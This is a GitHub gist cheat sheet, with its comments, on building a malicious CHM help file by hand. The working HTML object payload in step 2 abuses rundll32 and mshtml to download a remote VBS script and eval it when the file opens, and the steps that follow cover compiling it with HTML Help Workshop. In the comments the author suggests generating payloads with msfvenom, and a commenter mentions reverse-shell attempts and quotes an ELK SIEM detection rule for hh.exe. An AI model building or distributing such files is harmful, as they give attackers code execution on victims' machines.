Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
CheatSheet describing how to create malicious CHM file by hand (another approach is to use Nishang's Out-Chm scriptlet).

Procedure for generating Malicious CHM file

  • Step 0: Download and install Microsoft HTML Help Workshop and Documentation
  • Step 1: Obtain a valid CHM file and unpack it using 7-zip
  • Step 2: Find an entry-point HTML file within "docs" directory and insert the following code into it's <body> section:
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Button" value="Bitmap::shortcut">
  <PARAM name="Item1" value=',cmd.exe,/c copy /Y C:\Windows\system32\rundll32.exe %TEMP%\out.exe > nul && %TEMP%\out.exe javascript:"\..\mshtml RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8000/test.vbs",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im out.exe",0,true);}'>
  <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
  x.Click();
</SCRIPT>
  • Step 3: Prepare Project.hpp file with contents like the below ones:
[OPTIONS]
Contents file=<PATH-TO-UNPACKED-CHM-DIRECTORY>\Table of Contents.hhc
[FILES]
<PATH-TO-UNPACKED-CHM-DIRECTORY>\docs\Malicious-File.htm

Add every file needed by that CHM to the FILES section. Remember to include also previously modified malicious HTM file.

  • Step 4: Compile the project within CHM directory using hpp.exe compiler:
<PATH-TO-UNPACKED-CHM-DIRECTORY> "C:\Program Files (x86)\HTML Help Workshop\hhc.exe" Project.hpp
Microsoft HTML Help Compiler 4.74.8702

Compiling <PATH-TO-UNPACKED-CHM-DIRECTORY>\Project.chm


Compile time: 0 minutes, 1 second
353     Topics
7,208   Local links
187     Internet links
2       Graphics


Created <PATH-TO-UNPACKED-CHM-DIRECTORY>\Project.chm, 817,791 bytes
Compression decreased file by 2,091,702 bytes.
  • Step 5: PROFIT.
@clubby789

This comment has been minimized.

Copy link

@clubby789 clubby789 commented Oct 6, 2019

Sorry, which parrt is the bit to be edited to control what's executed? I assume most of the commands are setting it up.

@cyberblackhole

This comment has been minimized.

Copy link

@cyberblackhole cyberblackhole commented Nov 22, 2019

where is test.vbs file ?? . Can you also post that content?. I assume this is incomplete without it ..

@mgeeky

This comment has been minimized.

Copy link
Owner Author

@mgeeky mgeeky commented Nov 26, 2019

This was only a demonstration of where to put your command to. You can have any sort of VBS, ps1, js script there really. For a simplest example - generate yourself a one using publicly available toolkits such as msfvenom.

@Jackson-Pollock

This comment has been minimized.

Copy link

@Jackson-Pollock Jackson-Pollock commented May 23, 2021

Someone please suggest .chm payload where hh.exe will make network connection (this is SIEM rule test requirement) I tried this and Out-CHM.ps1 to create reverse shell payload with powershell/nc.exe but that doesn't meet the requirement of network connection by hh.exe.

This is to meet ELK SIEM rule query-

sequence by process.entity_id [process where process.name : "hh.exe" and event.type == "start"] [network where process.name : "hh.exe" and not cidrmatch(destination.ip, "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment